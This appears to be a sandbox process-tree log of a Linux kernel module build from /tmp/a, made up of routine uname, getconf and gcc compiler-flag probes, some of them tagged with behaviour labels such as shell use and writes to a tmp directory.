/usr/bin/catcat2⤵PID:1466
-
-
/usr/bin/unameuname -r2⤵PID:1468
-
-
/usr/bin/catcat2⤵PID:1467
-
-
/usr/bin/unameuname -r2⤵PID:1469
-
-
/usr/bin/makemake -C /lib/modules/5.4.0-169-generic/build "M=/tmp/a" modules2⤵PID:1470
-
/bin/sh/bin/sh -c "uname -m | sed -e s/i.86/x86/ -e s/x86_64/x86/ -e s/sun4u/sparc64/ -e s/arm.*/arm/ -e s/sa110/arm/ -e s/s390x/s390/ -e s/parisc64/parisc/ -e s/ppc.*/powerpc/ -e s/mips.*/mips/ -e s/sh[234].*/sh/ -e s/aarch64.*/arm64/ -e s/riscv.*/riscv/"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1471 -
/usr/bin/sedsed -e s/i.86/x86/ -e s/x86_64/x86/ -e s/sun4u/sparc64/ -e "s/arm.*/arm/" -e s/sa110/arm/ -e s/s390x/s390/ -e s/parisc64/parisc/ -e "s/ppc.*/powerpc/" -e "s/mips.*/mips/" -e "s/sh[234].*/sh/" -e "s/aarch64.*/arm64/" -e "s/riscv.*/riscv/"4⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1473
-
-
/usr/bin/unameuname -m4⤵PID:1472
-
-
-
/bin/sh/bin/sh -c "getconf LFS_CFLAGS 2>/dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1474 -
/usr/bin/getconfgetconf LFS_CFLAGS4⤵PID:1475
-
-
-
/bin/sh/bin/sh -c "getconf LFS_LDFLAGS 2>/dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1476 -
/usr/bin/getconfgetconf LFS_LDFLAGS4⤵PID:1477
-
-
-
/bin/sh/bin/sh -c "getconf LFS_LIBS 2>/dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1478 -
/usr/bin/getconfgetconf LFS_LIBS4⤵PID:1479
-
-
-
/bin/sh/bin/sh -c "gcc --version 2>&1 | head -n 1 | grep clang"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1483 -
/usr/bin/grepgrep clang4⤵PID:1486
-
-
/usr/bin/headhead -n 14⤵PID:1485
-
-
/usr/bin/gccgcc --version4⤵PID:1484
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -fno-tree-loop-im -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-tree-loop-im\"; else echo \"\"; fi"3⤵PID:1487
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_14874⤵PID:1488
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-tree-loop-im -c -x c /dev/null -o /tmp/a/.tmp_1487/tmp4⤵
- Writes file to tmp directory
PID:1489 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1487/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fno-tree-loop-im -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccgoRzaN.s5⤵
- Writes file to tmp directory
PID:1490
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1487/tmp /tmp/ccgoRzaN.s5⤵PID:1491
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1487/tmp /tmp/ccgoRzaN.s5⤵PID:1491
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1487/tmp /tmp/ccgoRzaN.s5⤵PID:1491
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1487/tmp /tmp/ccgoRzaN.s5⤵PID:1491
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_14874⤵PID:1492
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -Wmaybe-uninitialized -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-maybe-uninitialized\"; else echo \"\"; fi"3⤵PID:1493
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_14934⤵PID:1494
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -Wmaybe-uninitialized -c -x c /dev/null -o /tmp/a/.tmp_1493/tmp4⤵PID:1495
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1493/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wmaybe-uninitialized "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccdOHWug.s5⤵PID:1496
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1493/tmp /tmp/ccdOHWug.s5⤵PID:1500
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1493/tmp /tmp/ccdOHWug.s5⤵PID:1500
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1493/tmp /tmp/ccdOHWug.s5⤵PID:1500
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1493/tmp /tmp/ccdOHWug.s5⤵PID:1500
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_14934⤵PID:1503
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mretpoline-external-thunk -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mretpoline-external-thunk\"; else echo \"\"; fi"3⤵PID:1506
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15064⤵PID:1507
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mretpoline-external-thunk -c -x c /dev/null -o /tmp/a/.tmp_1506/tmp4⤵PID:1508
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15064⤵PID:1513
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mindirect-branch=thunk-extern -mindirect-branch-register -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mindirect-branch=thunk-extern -mindirect-branch-register\"; else echo \"\"; fi"3⤵PID:1516
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15164⤵PID:1517
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-mindirect-branch=thunk-extern" -mindirect-branch-register -c -x c /dev/null -o /tmp/a/.tmp_1516/tmp4⤵
- Writes file to tmp directory
PID:1518 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mindirect-branch=thunk-extern" -mindirect-branch-register "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1516/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccQ8zBgX.s5⤵PID:1519
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1516/tmp /tmp/ccQ8zBgX.s5⤵PID:1525
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1516/tmp /tmp/ccQ8zBgX.s5⤵PID:1525
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1516/tmp /tmp/ccQ8zBgX.s5⤵PID:1525
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1516/tmp /tmp/ccQ8zBgX.s5⤵PID:1525
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15164⤵PID:1526
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mretpoline -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mretpoline\"; else echo \"\"; fi"3⤵PID:1529
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15294⤵PID:1530
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mretpoline -c -x c /dev/null -o /tmp/a/.tmp_1529/tmp4⤵PID:1531
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15294⤵PID:1534
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mindirect-branch=thunk-inline -mindirect-branch-register -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mindirect-branch=thunk-inline -mindirect-branch-register\"; else echo \"\"; fi"3⤵PID:1535
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15354⤵PID:1536
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-mindirect-branch=thunk-inline" -mindirect-branch-register -c -x c /dev/null -o /tmp/a/.tmp_1535/tmp4⤵PID:1537
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mindirect-branch=thunk-inline" -mindirect-branch-register "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1535/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccYCjvBo.s5⤵
- Writes file to tmp directory
PID:1540
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1535/tmp /tmp/ccYCjvBo.s5⤵PID:1543
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1535/tmp /tmp/ccYCjvBo.s5⤵PID:1543
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1535/tmp /tmp/ccYCjvBo.s5⤵PID:1543
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1535/tmp /tmp/ccYCjvBo.s5⤵PID:1543
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15354⤵PID:1546
-
-
-
/usr/local/sbin/unameuname -m3⤵PID:1549
-
-
/usr/local/bin/unameuname -m3⤵PID:1549
-
-
/usr/sbin/unameuname -m3⤵PID:1549
-
-
/usr/bin/unameuname -m3⤵PID:1549
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mpreferred-stack-boundary=4 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -mpreferred-stack-boundary=4\"; else echo \"\"; fi"3⤵PID:1550
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15504⤵PID:1551
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-mpreferred-stack-boundary=4" -c -x c /dev/null -o /tmp/a/.tmp_1550/tmp4⤵
- Writes file to tmp directory
PID:1552 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mpreferred-stack-boundary=4" "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1550/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccUcHYOz.s5⤵PID:1553
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1550/tmp /tmp/ccUcHYOz.s5⤵PID:1556
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1550/tmp /tmp/ccUcHYOz.s5⤵PID:1556
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1550/tmp /tmp/ccUcHYOz.s5⤵PID:1556
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1550/tmp /tmp/ccUcHYOz.s5⤵
- Writes file to tmp directory
PID:1556
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15504⤵PID:1561
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -m16 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -m16\"; else echo \" -m32 -Wa,./arch/x86/boot/code16gcc.h\"; fi"3⤵PID:1562
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15624⤵
- Reads runtime system information
PID:1563
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -m16 -c -x c /dev/null -o /tmp/a/.tmp_1562/tmp4⤵PID:1564
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -m16 "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1562/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccHIzOZs.s5⤵PID:1565
-
-
/usr/local/sbin/asas --32 -o /tmp/a/.tmp_1562/tmp /tmp/ccHIzOZs.s5⤵PID:1566
-
-
/usr/local/bin/asas --32 -o /tmp/a/.tmp_1562/tmp /tmp/ccHIzOZs.s5⤵PID:1566
-
-
/usr/sbin/asas --32 -o /tmp/a/.tmp_1562/tmp /tmp/ccHIzOZs.s5⤵PID:1566
-
-
/usr/bin/asas --32 -o /tmp/a/.tmp_1562/tmp /tmp/ccHIzOZs.s5⤵PID:1566
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15624⤵PID:1567
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -fcf-protection=none -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fcf-protection=none\"; else echo \"\"; fi"3⤵PID:1568
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15684⤵PID:1569
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-fcf-protection=none" -c -x c /dev/null -o /tmp/a/.tmp_1568/tmp4⤵PID:1570
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1568/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccnJd2OU.s5⤵PID:1571
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1568/tmp /tmp/ccnJd2OU.s5⤵PID:1572
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1568/tmp /tmp/ccnJd2OU.s5⤵PID:1572
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1568/tmp /tmp/ccnJd2OU.s5⤵PID:1572
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1568/tmp /tmp/ccnJd2OU.s5⤵PID:1572
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15684⤵PID:1573
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -m16 -g -Os -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes -march=i386 -mregparm=3 -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -fcf-protection=none -ffreestanding -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -ffreestanding\"; else echo \"\"; fi"3⤵PID:1574
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15744⤵PID:1575
-
-
/usr/bin/gccgcc -Werror -m16 -g -Os -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes "-march=i386" "-mregparm=3" -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse "-fcf-protection=none" -ffreestanding -c -x c /dev/null -o /tmp/a/.tmp_1574/tmp4⤵
- Writes file to tmp directory
PID:1576 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D DISABLE_BRANCH_PROFILING /dev/null -quiet -dumpbase null -m16 "-march=i386" "-mregparm=3" -mno-mmx -mno-sse -auxbase-strip /tmp/a/.tmp_1574/tmp -g -Os -Werror -Wall -Wstrict-prototypes -fno-strict-aliasing -fomit-frame-pointer -fno-pic "-fcf-protection=none" -ffreestanding -fasynchronous-unwind-tables -Wformat-security -fstack-clash-protection -o /tmp/ccWFz58l.s5⤵PID:1577
-
-
/usr/local/sbin/asas --32 -o /tmp/a/.tmp_1574/tmp /tmp/ccWFz58l.s5⤵PID:1578
-
-
/usr/local/bin/asas --32 -o /tmp/a/.tmp_1574/tmp /tmp/ccWFz58l.s5⤵PID:1578
-
-
/usr/sbin/asas --32 -o /tmp/a/.tmp_1574/tmp /tmp/ccWFz58l.s5⤵PID:1578
-
-
/usr/bin/asas --32 -o /tmp/a/.tmp_1574/tmp /tmp/ccWFz58l.s5⤵PID:1578
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15744⤵PID:1579
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -m16 -g -Os -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes -march=i386 -mregparm=3 -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -fcf-protection=none -ffreestanding -fno-stack-protector -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -fno-stack-protector\"; else echo \"\"; fi"3⤵PID:1580
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15804⤵PID:1581
-
-
/usr/bin/gccgcc -Werror -m16 -g -Os -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes "-march=i386" "-mregparm=3" -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse "-fcf-protection=none" -ffreestanding -fno-stack-protector -c -x c /dev/null -o /tmp/a/.tmp_1580/tmp4⤵PID:1582
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D DISABLE_BRANCH_PROFILING /dev/null -quiet -dumpbase null -m16 "-march=i386" "-mregparm=3" -mno-mmx -mno-sse -auxbase-strip /tmp/a/.tmp_1580/tmp -g -Os -Werror -Wall -Wstrict-prototypes -fno-strict-aliasing -fomit-frame-pointer -fno-pic "-fcf-protection=none" -ffreestanding -fno-stack-protector -fasynchronous-unwind-tables -Wformat-security -fstack-clash-protection -o /tmp/ccsBWp2M.s5⤵
- Writes file to tmp directory
PID:1583
-
-
/usr/local/sbin/asas --32 -o /tmp/a/.tmp_1580/tmp /tmp/ccsBWp2M.s5⤵PID:1584
-
-
/usr/local/bin/asas --32 -o /tmp/a/.tmp_1580/tmp /tmp/ccsBWp2M.s5⤵PID:1584
-
-
/usr/sbin/asas --32 -o /tmp/a/.tmp_1580/tmp /tmp/ccsBWp2M.s5⤵PID:1584
-
-
/usr/bin/asas --32 -o /tmp/a/.tmp_1580/tmp /tmp/ccsBWp2M.s5⤵PID:1584
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15804⤵PID:1585
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -m16 -g -Os -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes -march=i386 -mregparm=3 -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -fcf-protection=none -ffreestanding -fno-stack-protector -Wno-address-of-packed-member -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -Wno-address-of-packed-member\"; else echo \"\"; fi"3⤵PID:1586
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_15864⤵PID:1587
-
-
/usr/bin/gccgcc -Werror -m16 -g -Os -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes "-march=i386" "-mregparm=3" -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse "-fcf-protection=none" -ffreestanding -fno-stack-protector -Wno-address-of-packed-member -c -x c /dev/null -o /tmp/a/.tmp_1586/tmp4⤵PID:1588
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D DISABLE_BRANCH_PROFILING /dev/null -quiet -dumpbase null -m16 "-march=i386" "-mregparm=3" -mno-mmx -mno-sse -auxbase-strip /tmp/a/.tmp_1586/tmp -g -Os -Werror -Wall -Wstrict-prototypes -Wno-address-of-packed-member -fno-strict-aliasing -fomit-frame-pointer -fno-pic "-fcf-protection=none" -ffreestanding -fno-stack-protector -fasynchronous-unwind-tables -Wformat-security -fstack-clash-protection -o /tmp/cc63TAVf.s5⤵PID:1589
-
-
/usr/local/sbin/asas --32 -o /tmp/a/.tmp_1586/tmp /tmp/cc63TAVf.s5⤵PID:1590
-
-
/usr/local/bin/asas --32 -o /tmp/a/.tmp_1586/tmp /tmp/cc63TAVf.s5⤵PID:1590
-
-
/usr/sbin/asas --32 -o /tmp/a/.tmp_1586/tmp /tmp/cc63TAVf.s5⤵PID:1590
-
-
/usr/bin/asas --32 -o /tmp/a/.tmp_1586/tmp /tmp/cc63TAVf.s5⤵PID:1590
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_15864⤵PID:1591
-
-
-
